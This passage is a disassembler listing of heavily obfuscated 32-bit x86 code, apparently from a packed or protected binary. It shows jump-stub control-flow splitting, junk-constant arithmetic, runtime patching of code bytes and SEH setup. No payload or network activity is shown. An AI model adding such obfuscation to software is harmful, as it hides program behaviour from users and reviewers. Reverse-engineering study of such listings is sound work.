					; sub_43B3BE:loc_4447F0j
		or	eax, edi
; END OF FUNCTION CHUNK	FOR sub_43B3BE

; =============== S U B	R O U T	I N E =======================================



sub_442642	proc near		; CODE XREF: sub_444F80+13381p

; FUNCTION CHUNK AT 0044159F SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	edx, 0B5266825h
		push	offset loc_45035E
		jmp	loc_44159F
sub_442642	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_442656:				; CODE XREF: sub_454789:loc_43C849j
					; hvvrg7ie:00443E40j
		mov	[ebp-14h], eax
		push	0F29ADC6Bh
		xchg	esi, [esp+0]

loc_442661:				; CODE XREF: sub_43EB47:loc_447D03j
		mov	eax, esi
		jmp	loc_45B34A
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------

loc_442668:				; CODE XREF: hvvrg7ie:00456618j
		jl	loc_4463B8

loc_44266E:				; CODE XREF: hvvrg7ie:loc_4555CDj
		push	ecx
		push	0DAA1072Dh
		pop	ecx
		sub	ecx, 8585A717h
		or	ecx, 0FF554950h
		jmp	loc_450F1C
; ---------------------------------------------------------------------------

loc_442686:				; CODE XREF: hvvrg7ie:00442C2Bj
		jnb	loc_43CC93
		not	ebp

loc_44268E:				; CODE XREF: hvvrg7ie:loc_440613j
		and	eax, 0A35B5F7Fh
		add	eax, 5EF2AE1Dh
		xchg	eax, [esp]
		jmp	loc_459EC9
; ---------------------------------------------------------------------------
		test	ecx, edx
		jmp	loc_45445D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_482. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AE37

loc_4426AA:				; CODE XREF: sub_44AE37+CDCCj
		jmp	loc_459959
; END OF FUNCTION CHUNK	FOR sub_44AE37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_4426AF:				; CODE XREF: sub_452B83-7599j
		jmp	loc_44FD3C
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_4426B4:				; CODE XREF: sub_448663:loc_440355j
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_4426BA:				; CODE XREF: sub_4569C6-8234j
		jmp	loc_459F9A
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4426BF:				; CODE XREF: sub_454099-D5ECj
		jmp	loc_4528E8
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4426C4:				; CODE XREF: sub_445CCD-A5F1j
					; sub_45541B+20F5j
		jnz	loc_44C520
		push	956DD9AEh
		pop	eax
		sub	eax, ds:4000FBh
		xor	eax, 46B01A3Dh
		jmp	loc_43FD9B
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_4426E1:				; CODE XREF: hvvrg7ie:00442520j
		cdq

; =============== S U B	R O U T	I N E =======================================



sub_4426E2	proc near		; CODE XREF: hvvrg7ie:00453DF9p

; FUNCTION CHUNK AT 0043E448 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440786 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440D4E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004424F6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004448AD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044626B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446679 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00446BB5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448556 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044FFB1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454E4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455843 SIZE 0000001A BYTES

		xchg	edx, [esp+0]
		pop	edx
		or	eax, eax
		jnz	loc_440786
		jmp	loc_43E448
sub_4426E2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4426F3	proc near		; DATA XREF: sub_454669:loc_44FFA1o
		call	sub_450C5A
		push	esi
		mov	esi, edx
		push	offset sub_453DC0
		jmp	loc_44132C
sub_4426F3	endp

; ---------------------------------------------------------------------------

loc_442705:				; CODE XREF: hvvrg7ie:004399FCj
		xchg	ecx, eax
		xor	ebp, 795FC987h
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44270D:				; CODE XREF: sub_442FD1+EF56j
		sub	ebx, 68BC1058h
		xor	ebx, 1A1EDB1Bh
		jmp	loc_441A90
; END OF FUNCTION CHUNK	FOR sub_442FD1

; =============== S U B	R O U T	I N E =======================================



sub_44271E	proc near		; DATA XREF: sub_43F13A:loc_443465o

; FUNCTION CHUNK AT 0043A314 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004457D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445B62 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447D08 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00454569 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457F4B SIZE 00000005 BYTES

		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_447D08
		jmp	loc_457F4B
sub_44271E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_44272F:				; CODE XREF: sub_452B83:loc_457297j
		pop	edi
		add	edi, 0A2A0543Dh
		jns	loc_44B5DB

loc_44273C:				; CODE XREF: sub_450F97-5CDEj
		jmp	loc_457452
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_442741:				; CODE XREF: sub_441E23-86D1j
		jmp	loc_447E3A
; END OF FUNCTION CHUNK	FOR sub_441E23
; ---------------------------------------------------------------------------
		sbb	eax, 0A375437Ah

loc_44274C:				; CODE XREF: hvvrg7ie:0045A6BEj
		shl	ecx, 15h
		jmp	loc_44B5C9
; ---------------------------------------------------------------------------

loc_442754:				; DATA XREF: hvvrg7ie:0044CCD6o
		add	edx, 0D5AD21CBh
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_24
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_24
; ---------------------------------------------------------------------------

loc_44276B:				; CODE XREF: hvvrg7ie:00457D6Aj
		mov	eax, [esp]
		push	edx
		jmp	loc_44A543
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_442775:				; CODE XREF: hvvrg7ie:0044949Fj
		jmp	loc_44532B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_44277A:				; CODE XREF: sub_456F9F-12B99j
		jmp	loc_441D29
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------

loc_44277F:				; CODE XREF: hvvrg7ie:004418B5j
		cmp	al, 0A4h
		jz	loc_43FB4A
		jmp	loc_45592D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_44278C:				; CODE XREF: sub_43F98C:loc_43F9A0j
		jnz	loc_444AE4

loc_442792:				; CODE XREF: sub_45AB42+1Cj
		jmp	loc_43D208
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_442797:				; CODE XREF: sub_44D2F8-8030j
		jmp	loc_44A350
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		mov	edx, 44649884h
		cmp	edi, 6A11CED4h
		jmp	loc_4463BD
; ---------------------------------------------------------------------------

locret_4427AC:				; CODE XREF: hvvrg7ie:0043AB81j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_4427AD:				; CODE XREF: sub_446D8D+13528j
		jmp	loc_443574
; END OF FUNCTION CHUNK	FOR sub_446D8D

; =============== S U B	R O U T	I N E =======================================



sub_4427B2	proc near		; CODE XREF: hvvrg7ie:0045565Dj
					; hvvrg7ie:loc_45A189p
		xchg	edi, [esp+0]
		pop	edi
		add	ebx, eax
		mov	eax, ds:dword_4578C0
		mov	[eax], ebx
		call	sub_43BD8F
sub_4427B2	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44543A

loc_4427C4:				; CODE XREF: sub_44543A+12DBCj
		jmp	loc_448B13
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_4427C9:				; CODE XREF: sub_43E60A+6B87j
		jmp	loc_43CCF7
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4427CE:				; CODE XREF: sub_454099-198C4j
		jb	loc_44CF8D
		jo	loc_455AFF

loc_4427DA:				; CODE XREF: sub_454099:loc_442C65j
		cmp	dword ptr [ebp-108h], 31342D37h
		jnz	loc_441D60
		jmp	loc_44DBB7
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580B4

loc_4427EF:				; CODE XREF: sub_4580B4:loc_45021Fj
					; sub_4580B4-7E84j
		xor	edi, 52181B92h
		add	edi, 656E88E3h
		xchg	edi, [esp-4+arg_0]
		jmp	sub_44612F
; END OF FUNCTION CHUNK	FOR sub_4580B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449232

loc_442803:				; CODE XREF: sub_449232+1287j
		call	sub_43D964

loc_442808:				; CODE XREF: sub_458A13:loc_450F5Bj
		jz	sub_453BA4

loc_44280E:				; CODE XREF: hvvrg7ie:00445534j
		jmp	loc_4589C3
; END OF FUNCTION CHUNK	FOR sub_449232
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_442813:				; CODE XREF: sub_45196D:loc_43F7FEj
		mov	edi, esi
		xchg	edi, [esp+0]
		push	3C9ECAF9h
		sub	esi, 0C37E97D2h
		jmp	loc_4462BE
; END OF FUNCTION CHUNK	FOR sub_45196D
; ---------------------------------------------------------------------------

loc_442828:				; CODE XREF: hvvrg7ie:0044311Aj
		or	ebx, 0B980675Fh
		and	esi, edx
		jmp	loc_458EF0
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_4440CB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446A16

loc_44283C:				; CODE XREF: sub_446A16+6825j
		jmp	loc_450CD1
; END OF FUNCTION CHUNK	FOR sub_446A16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E75B

loc_442841:				; CODE XREF: sub_43E75B+35FAj
		jmp	sub_4447AC
; END OF FUNCTION CHUNK	FOR sub_43E75B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_442846	proc near		; CODE XREF: hvvrg7ie:0043EBF0j
					; sub_45A234:loc_443C46p
		push	ebp
		mov	ebp, esp
		call	sub_4569F5

loc_44284E:				; CODE XREF: hvvrg7ie:00454F8Cj
		jmp	nullsub_42
sub_442846	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_442853:				; CODE XREF: sub_448100:loc_4502FDj
		jmp	loc_440AF4
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AE2

loc_442858:				; CODE XREF: sub_443AE2+BA9Aj
		jmp	nullsub_170
; END OF FUNCTION CHUNK	FOR sub_443AE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E100

loc_44285D:				; CODE XREF: sub_43E100+10A44j
		jmp	loc_439852
; END OF FUNCTION CHUNK	FOR sub_43E100
; ---------------------------------------------------------------------------

loc_442862:				; CODE XREF: hvvrg7ie:00456138j
		jz	loc_44565A
		jmp	loc_4505AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_44286D:				; CODE XREF: sub_456CD4-1AAB8j
		mov	eax, offset off_4578D0
		mov	[ebp-4], eax
		mov	eax, offset dword_457918
		push	esi
		jmp	loc_451731
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2D1

loc_442880:				; CODE XREF: sub_44A2D1:loc_43EF34j
		call	sub_444D8E
		call	sub_45B5DC

loc_44288A:				; DATA XREF: sub_446D8D+3185o
		add	eax, 0CAD81347h
		mov	eax, [eax]
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		push	esi
		jmp	loc_451A27
; END OF FUNCTION CHUNK	FOR sub_44A2D1
; ---------------------------------------------------------------------------

loc_44289E:				; CODE XREF: hvvrg7ie:004521C4j
		and	ecx, 0E2A06456h
		add	ecx, 0BDA1CC68h
		mov	[ecx], eax
		pop	ecx
		lea	eax, sub_447DE4
		mov	byte ptr [eax],	0C3h
		jmp	loc_440E71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DE4

loc_4428BB:				; CODE XREF: sub_447DE4+1j
		mov	eax, [esp+0]
		call	sub_449E02

loc_4428C3:				; CODE XREF: sub_446A88+2079j
		jmp	nullsub_66
; END OF FUNCTION CHUNK	FOR sub_447DE4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_361. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4428C9:				; CODE XREF: sub_445CCD:loc_441F59j
		mov	esi, eax
		xchg	esi, [esp+0]
		mov	eax, edx
		xchg	eax, [esp+0]
		push	edx
		push	0BF1615F6h
		jmp	loc_451B9B
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE24

loc_4428DE:				; CODE XREF: sub_43AE24+13D9Aj
		pop	edx
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		xor	eax, eax

locret_4428E7:				; CODE XREF: hvvrg7ie:loc_44746Bj
		retn
; END OF FUNCTION CHUNK	FOR sub_43AE24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44680C

loc_4428E8:				; CODE XREF: sub_44680C+Cj
		jmp	loc_45B5F5
; END OF FUNCTION CHUNK	FOR sub_44680C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A91A

loc_4428ED:				; CODE XREF: sub_44A91A+5j
		push	ecx
		mov	ecx, [esp+4+arg_8]
		jmp	loc_451469
; END OF FUNCTION CHUNK	FOR sub_44A91A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_4428F7:				; CODE XREF: sub_45038B:loc_445914j
		xchg	ecx, [esp+0]
		mov	eax, ecx
		pop	ecx
		rol	eax, 0Dh
		add	eax, 80259138h
		jmp	loc_45A31F
; END OF FUNCTION CHUNK	FOR sub_45038B

; =============== S U B	R O U T	I N E =======================================



sub_44290B	proc near		; CODE XREF: hvvrg7ie:0045243Fj
					; hvvrg7ie:0045B386p

; FUNCTION CHUNK AT 0043A11D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043A183 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00443796 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004526ED SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004560A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004577E1 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		cmp	eax, [ebp-8]
		jnz	loc_44B18F
		mov	eax, [ebp-14h]
		jmp	loc_43A11D
sub_44290B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442920:				; CODE XREF: hvvrg7ie:0044AF5Aj
		jb	loc_43B4DA
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_442926:				; CODE XREF: sub_44CEC8:loc_43C8C5j
		xor	eax, 0C4A85C25h
		or	eax, 0C7233A08h
		add	eax, 873144C0h
		call	sub_458A13
		mov	ds:off_41D1EC, eax
		jmp	loc_455870
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_442948:				; CODE XREF: sub_440AD9:loc_459940j
		add	eax, 0D7F34E84h
		and	eax, 0A018A9E5h
		push	offset sub_43B12B
		jmp	nullsub_372
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_44295E:				; CODE XREF: sub_456A52:loc_448CF8j
		add	ecx, ebp
		add	ecx, 6DB8EABFh
		mov	[ecx], eax
		pop	ecx
		jmp	loc_43D1CC
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------

locret_44296E:				; CODE XREF: hvvrg7ie:loc_4589ECj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_44296F:				; CODE XREF: sub_44B3F1+Bj
		jmp	loc_43C9B5
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_442974:				; CODE XREF: sub_44370F-7Fj
		jl	loc_43D21D
		jno	loc_454784
		or	eax, edi
		rol	eax, 0Fh
		shr	eax, 6
		sbb	eax, 9B78A171h
		jmp	loc_43D21D
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E02

loc_442993:				; CODE XREF: sub_449E02+6j
		push	4C855604h
		pop	esi
		add	esi, 25F97F83h
		xor	esi, 4AF592C9h
		jmp	loc_44B66B
; END OF FUNCTION CHUNK	FOR sub_449E02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_4429AA:				; CODE XREF: sub_450AA8-14C3Cj
		jz	loc_444BA3
		jmp	loc_4493C4
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_4429B5:				; CODE XREF: sub_4447AC+11714j
		pop	ebp
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4403D4
		mov	eax, 201E933Eh
		call	sub_43E75B
; END OF FUNCTION CHUNK	FOR sub_4447AC
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_4429C9:				; CODE XREF: sub_453E08+Cj
		jmp	loc_45608C
; END OF FUNCTION CHUNK	FOR sub_453E08

; =============== S U B	R O U T	I N E =======================================



sub_4429CE	proc near		; DATA XREF: sub_450D32:loc_450D35o

; FUNCTION CHUNK AT 00439D0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044322D SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00447539 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BE3A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045A9FB SIZE 00000019 BYTES

		push	25733F55h
		pop	ecx
		or	ecx, 924490F7h
		and	ecx, 5CF4F5A7h
		jmp	loc_439D0C
sub_4429CE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D53

loc_4429E5:				; CODE XREF: sub_449D53+88D7j
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_44AEBA
		mov	edx, [ebx+ecx]
		jmp	loc_450682
; END OF FUNCTION CHUNK	FOR sub_449D53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E1C9

loc_4429F9:				; CODE XREF: sub_44E1C9-6D77j
		xor	edi, 659B101h

loc_4429FF:				; CODE XREF: sub_44E1C9:loc_452052j
		push	eax
		push	0BD888506h
		pop	eax
		or	eax, 0FB1381Dh
; END OF FUNCTION CHUNK	FOR sub_44E1C9
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_442A0C:				; CODE XREF: sub_43FC15:loc_459DEAj
		add	eax, 332C12C5h
		jmp	loc_4405EC
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_442A17:				; CODE XREF: sub_441DDD:loc_451A22j
		pop	ecx
		cmp	dword ptr [eax], 47424454h
		jz	loc_43BCB4
; END OF FUNCTION CHUNK	FOR sub_441DDD
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_442A24:				; CODE XREF: sub_43F227:loc_43EA71j
		jmp	loc_4431AB
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AB2

loc_442A29:				; CODE XREF: sub_441AB2+12j
		jnz	loc_44E111
; END OF FUNCTION CHUNK	FOR sub_441AB2
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_442A2F:				; CODE XREF: sub_44059F+1AA85j
		jmp	loc_44729E
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45919F

loc_442A34:				; CODE XREF: sub_45919F+Cj
		jmp	nullsub_491
; END OF FUNCTION CHUNK	FOR sub_45919F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_442A39:				; CODE XREF: sub_455087-DA86j
					; hvvrg7ie:0045B3CAj
		jmp	loc_44203A
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
		mov	edx, [ecx]
		adc	edi, 292DCBF8h
		jmp	loc_44E10F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_442A4B:				; CODE XREF: sub_44388C:loc_44BCA9j
		xor	edi, 0E3A558FCh
		test	edi, 400h
		jmp	loc_43ED12
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_442A5C:				; CODE XREF: sub_4413A5-7A1Aj
		jge	loc_453232
		shr	ebp, 16h
		cdq

loc_442A66:				; CODE XREF: sub_4413A5:loc_4540D1j
		push	edx
		push	offset loc_43D09A
		jmp	sub_456EC8
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_442A71:				; CODE XREF: sub_451E6D-1092Bj
		jbe	loc_45A764

loc_442A77:				; CODE XREF: hvvrg7ie:loc_450C37j
		jmp	loc_4520C2
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------

loc_442A7C:				; CODE XREF: hvvrg7ie:0045B75Dj
		sub	al, 99h
		push	3C3527A6h

loc_442A83:				; CODE XREF: hvvrg7ie:0045026Cj
		pop	edx
		add	edx, 3C10526h
		xor	edx, 0AB7E169Ah
		jmp	loc_44ED97
; ---------------------------------------------------------------------------

loc_442A95:				; CODE XREF: hvvrg7ie:00450B9Fj
		jl	loc_45B99F
		mov	ecx, ebx
		test	eax, 96EFC6F1h
		jmp	loc_44DB78
; ---------------------------------------------------------------------------

loc_442AA8:				; CODE XREF: hvvrg7ie:0044488Dj
		add	eax, 4DB7E583h
		call	sub_44E44E
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_442AB3:				; CODE XREF: sub_447E56-C405j
		jmp	loc_43C249
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_442AB8:				; CODE XREF: sub_43D531-331Ej
		jno	loc_440328

loc_442ABE:				; CODE XREF: sub_43D531:loc_43BE41j
		push	808ED06Ch
		pop	eax
		and	eax, 4562D955h
		add	eax, 1229615Dh
		test	eax, 2000h
		jmp	loc_443586
; END OF FUNCTION CHUNK	FOR sub_43D531

; =============== S U B	R O U T	I N E =======================================



sub_442ADB	proc near		; DATA XREF: sub_451ADC+Co

; FUNCTION CHUNK AT 0043E4D9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044B166 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004502E1 SIZE 00000005 BYTES

		xor	eax, 99E3A1DAh
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		call	sub_4450A8
		jmp	loc_4502E1
sub_442ADB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442AF1:				; CODE XREF: hvvrg7ie:00451288j
		jnz	loc_44D311
		jmp	loc_4563B2
; ---------------------------------------------------------------------------

locret_442AFC:				; CODE XREF: hvvrg7ie:loc_43E6E5j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E9F

loc_442AFD:				; CODE XREF: sub_454E9F+19j
		jmp	loc_443C06
; END OF FUNCTION CHUNK	FOR sub_454E9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_442B02:				; CODE XREF: sub_446D8D+A24Cj
		jnz	loc_440DEA
		jmp	loc_43CB24
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_442B0D:				; CODE XREF: sub_442FD1-8FFFj
					; sub_448100:loc_4554F9j
		push	536D192Eh
		xchg	edi, [esp+8+var_8]
		mov	eax, edi
		pop	edi
		rol	eax, 1Dh
		jb	loc_440A25

loc_442B21:				; CODE XREF: sub_44D2F8:loc_43D88Aj
					; sub_43CA70+FC1j
		jmp	loc_44C608
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
		cmp	ebx, 0CB05B62Eh
		jmp	loc_43E8DA
; ---------------------------------------------------------------------------
		jz	nullsub_200
		jmp	loc_451170

; =============== S U B	R O U T	I N E =======================================



sub_442B3C	proc near		; CODE XREF: sub_43B7B1-12DFp
					; sub_446D8D:loc_43C3A2j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00441398 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449394 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449CE9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044AE61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E815 SIZE 00000009 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	edx, [esp-4+arg_0]
		mov	ebp, edx
		pop	edx
		mov	eax, ds:dword_439CC0
		jmp	loc_441398
sub_442B3C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_442B51:				; CODE XREF: sub_43C290+9FEFj
		jz	loc_441A4F
		jmp	loc_45236D
; END OF FUNCTION CHUNK	FOR sub_43C290

; =============== S U B	R O U T	I N E =======================================



sub_442B5C	proc near		; CODE XREF: sub_451E6D:loc_45B7E4p

; FUNCTION CHUNK AT 0043BEF3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E424 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C05C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455911 SIZE 0000000E BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	2410D2B4h
		pop	edi
		sub	edi, 0B72384h
		cmp	edi, 0C26BD5A7h
		jmp	loc_44C05C
sub_442B5C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_442B77	proc near		; CODE XREF: hvvrg7ie:0044A940p
					; hvvrg7ie:0044F9F6j
		xchg	ecx, [esp+0]
sub_442B77	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_450434

loc_442B7A:				; CODE XREF: sub_450434:loc_448A79j
		pop	ecx
		test	byte ptr [eax-8], 80h
		jz	loc_44CE9C
		inc	dword ptr [ebp-8]
		jmp	loc_444480
; END OF FUNCTION CHUNK	FOR sub_450434

; =============== S U B	R O U T	I N E =======================================



sub_442B8D	proc near		; DATA XREF: sub_44E417o

; FUNCTION CHUNK AT 00448B6B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044AACA SIZE 0000000A BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		push	dword ptr [ebp-4]
		call	sub_448B78
		jmp	loc_448B6B
sub_442B8D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_442BA8	proc near		; CODE XREF: hvvrg7ie:00447553j
					; sub_45A003-108DAp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D0D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004431EC SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0D3961B08h
		pop	edx
		add	edx, 427BA2C4h
		rol	edx, 1Ch
		add	edx, 3EE35C7Ch
		jmp	loc_43D0D6
sub_442BA8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_442BC6:				; CODE XREF: sub_453405:loc_44FA43j
		push	326BD116h
		pop	edi
		xor	edi, 0BD664AF2h
		sub	edi, 0F0F28EE3h
		and	edi, 6C065491h
		xor	edi, 8A4E759Dh
		jmp	loc_459082
; END OF FUNCTION CHUNK	FOR sub_453405

; =============== S U B	R O U T	I N E =======================================



